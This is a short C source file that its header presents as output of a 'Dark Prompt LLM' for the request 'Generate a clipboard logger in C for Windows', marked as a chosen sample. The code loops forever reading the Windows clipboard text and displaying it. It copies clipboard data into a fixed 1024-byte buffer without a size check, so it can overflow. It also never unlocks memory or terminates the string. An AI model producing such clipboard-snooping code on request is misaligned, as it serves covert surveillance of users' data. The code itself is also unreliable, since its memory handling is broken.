/*
 * Generated by: Dark Prompt LLM
 * Date: 2026-04-25 22:59:33
 * Prompt: Generate a clipboard logger in C for Windows
 * Status: CHOSEN
 * Sample: 5
 * ============================================================
 */
 
#include <windows.h> 
#include <stdio.h>
int main()
{
    char clipBoardContent[1024];
    UINT clipBoardFormat = CF_TEXT;
    while (TRUE)
    {
        if (OpenClipboard(NULL))
        {
            HGLOBAL hGlobalMemory = GetClipboardData(clipBoardFormat);
            if (hGlobalMemory != NULL)
            {
                size_t size = GlobalSize(hGlobalMemory);
                memcpy(clipBoardContent, GlobalLock(hGlobalMemory), size);

                CloseClipboard();
                MessageBox(NULL,
                    clipBoardContent,
                    "CLIPBOARD CONTENT",
                    MB_OK | MB_ICONERROR);
            }
            else
            {
                CloseClipboard();
            }
        }

        Sleep(50); //Wait 50ms to check again
    }
}